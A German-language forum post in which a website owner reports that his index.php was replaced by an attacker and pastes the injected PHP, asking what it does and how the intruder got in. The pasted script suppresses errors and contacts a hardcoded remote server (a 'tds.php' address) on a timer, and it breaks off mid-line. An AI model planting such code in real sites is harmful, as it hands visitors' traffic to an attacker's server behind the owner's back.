Hallo,
hatte einen Angriff auf eine meiner Domains (Linux Server mit OPEN-Suse 10.3 Serversoftware). Die index.php wurde gegen eine NEUE index.php ausgetauscht. Am Ende werde ich ich das Script einfügen! Kann mir jemand „GENAU“!!! erklären was dieses Script macht, denn alles kann ich nicht interpretieren. Mein Server hat ein 16stelliges Passwort, die Domain ein 14stelliges FTP-Passwort. Beide wurden auch inzwischen geändert. Wie ist DER/DIE da reingekommen???
Und bitte, dass niemand antwortet, der zuspät antwortet, weil er bei Mutti essen war und sowieso keine Ahnung hat!? (ALLES schon vorgekommen - reichlich)!
Hier das Hacker-SCRIPT:
<?php ini_set('display_errors',0);if(!function\_exists('sys\_get\_temp\_dir')) {function sys\_get\_temp\_dir() {if(!empty($\_ENV['TMP'])) {return realpath($\_ENV['TMP']);} if(!empty($\_ENV['TMPDIR'])) {return realpath($\_ENV['TMPDIR']);} if(!empty($\_ENV['TEMP'])) {return realpath($\_ENV['TEMP']);} $tempfile=tempnam(\_\_FILE\_\_,''); if(file\_exists($tempfile)) {unlink($tempfile); return realpath(dirname($tempfile));}return null;}} $geturl='[http://188.190.124.81/tds.php](http://188.190.124.81/tds.php)'; $timeout=180;$default\_url='[http://www.google.com/robots.txt](http://www.google.com/robots.txt)'; if(!$geturl)exit(); $base=ini\_get('upload\_tmp\_dir'); if($base==null)$base=sys\_get\_temp\_dir(); $tmp\_settings=$base."/settings.json"; $settings=file\_exists($tmp\_settings)?unserialize(file\_get\_contents($tmp\_settings)):array('last'=\>0,'url'=\>$default\_url); if($settings['last'] SCRIPT-ENDE. Ich hoffe... MacFlie